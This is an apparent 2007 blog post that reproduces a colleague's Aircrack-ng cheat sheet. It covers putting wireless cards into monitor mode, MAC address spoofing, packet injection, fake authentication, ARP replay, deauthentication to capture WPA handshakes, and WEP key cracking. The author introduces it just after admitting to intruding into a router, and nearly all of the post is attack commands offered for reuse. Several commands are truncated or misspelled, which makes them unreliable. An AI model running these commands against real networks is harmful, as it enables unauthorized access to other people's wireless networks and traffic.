One day after intruding into the router, i remembered my colleague Mark compiled a list of Aircrack-ng commands for cracking and injection. He was doing a wireless project and managed to capture the commands needed when doing the pentest. Check it out. This is a summarized version of the Aircrack-ng commands and it comes in very handy when doing a wireless audit and save you the time needed to read manuals. Use it in your next wireless audit. Thank you Mark for the compilation and your effort.
--------------------------------------------------------------------
install madwifi-ng driver (done! monitor mode working)
install rt73 driver for dlink usb (done! monitor mode working)
install rtutilt for rausb0 configuration
install aircrack-ng (done dev version from svn)
Steps:
#####################################################
CONFIGURATION:
D-Link DWL-G122
ifconfig rausb0 up
iwpriv rausb0 forceprism 1
iwpriv rausb0 rfmontx 1
iwconfig rausb0 mode monitor OR
airmon-ng start rausb0 channel
NetGear WG511T
wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode monitor
specify channel
iwocnfig ath0 channel n
########################################################
CHANGING MAC ADDRESS
ifconfig ath0 down
ifconfig ath0 hw ether
ifconfig ath0 up
use macchanger instead
#########################################################
INJECTION TESTING
NetGear WG511T
aireplay-ng -9
===================
D-Lnk DWL G122
aireplay-ng -9 (if this doesn't work it means no ap on same channel found)
Try card-to-card injection below:
====================
Card-To-Card Injection:
Make sure they are on same channel using
iwlist
aireplay-ng -9 -i ath0 rausb0 (ath0 will mimic an access point)
aireplay-ng -9 -i rausb0 ath0 (rausb0 will mimic an access point)
=====================
########################################################
PACKET CAPTURE:
airodump-ng device (find out first the interested bssid and channel)
Then capture packets on that particular channel:
airodump-ng --channel
Notes: capture full packets when using PTW attack (don't dump ivs only)
MERGING capture files (RESUMING)
mergecap -w out.cap test1.cap test2.cap test3.cap
FOR IVS
use ivstools
############################################################
ATTACKS
You may want to associate to ap first using fakeauth before any test
aireplay-ng --fakeauth=0 -e SSID -a 00:1a:6d:f8:40:d0
Automatic Association:
ireplay-ng -1 6000 -o 1 -q 10 -e SSID -a 00:1A:6D:F8:40:D0 -h 06:14:6C:4C:B9:7C ath0
ARP replay (for wep cracking PTW method):
if RXQ in airodump window is > 90 then #/s = 200+ (watch for #Data, it contains IV)
aireplay-ng --arpreplay -b
Deauthentication (to capture WPA handshake, reveal hidden SSID)
Fake Authentication (to authenticate to AP in case needed before we can inject)
#############################################################
WEP CRACKING
Using PTW attack (version 0.9+ only) Packets must be ARP (from arp-replay)
aircrack-ng -z -b
40-bit = 20,000
104-bit = 40,000
Normal Attack
-n 64 (test if 40-bin WEP) remove -n for 104-bit (default)
aircrack-ng -n 64 -a 1 capturefile
#########################################################
RESOLVE MAC Address to IP Address
use netdiscover or ARP tools
##########################################################
Determine the frequency on a particular channel
http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels then select "Wifi Channel Selection and Channel Overlap" tab.
#######################################################
Increasing injection Speed
iwconfig device rate 11M
#####################################################
---------------------------------------------------------------------------
The Hacka Man
Rabu, 31 Oktober 2007
Hacking and Cracking Wireless
10.08
No comments
Langganan:
Posting Komentar (Atom)
0 komentar:
Posting Komentar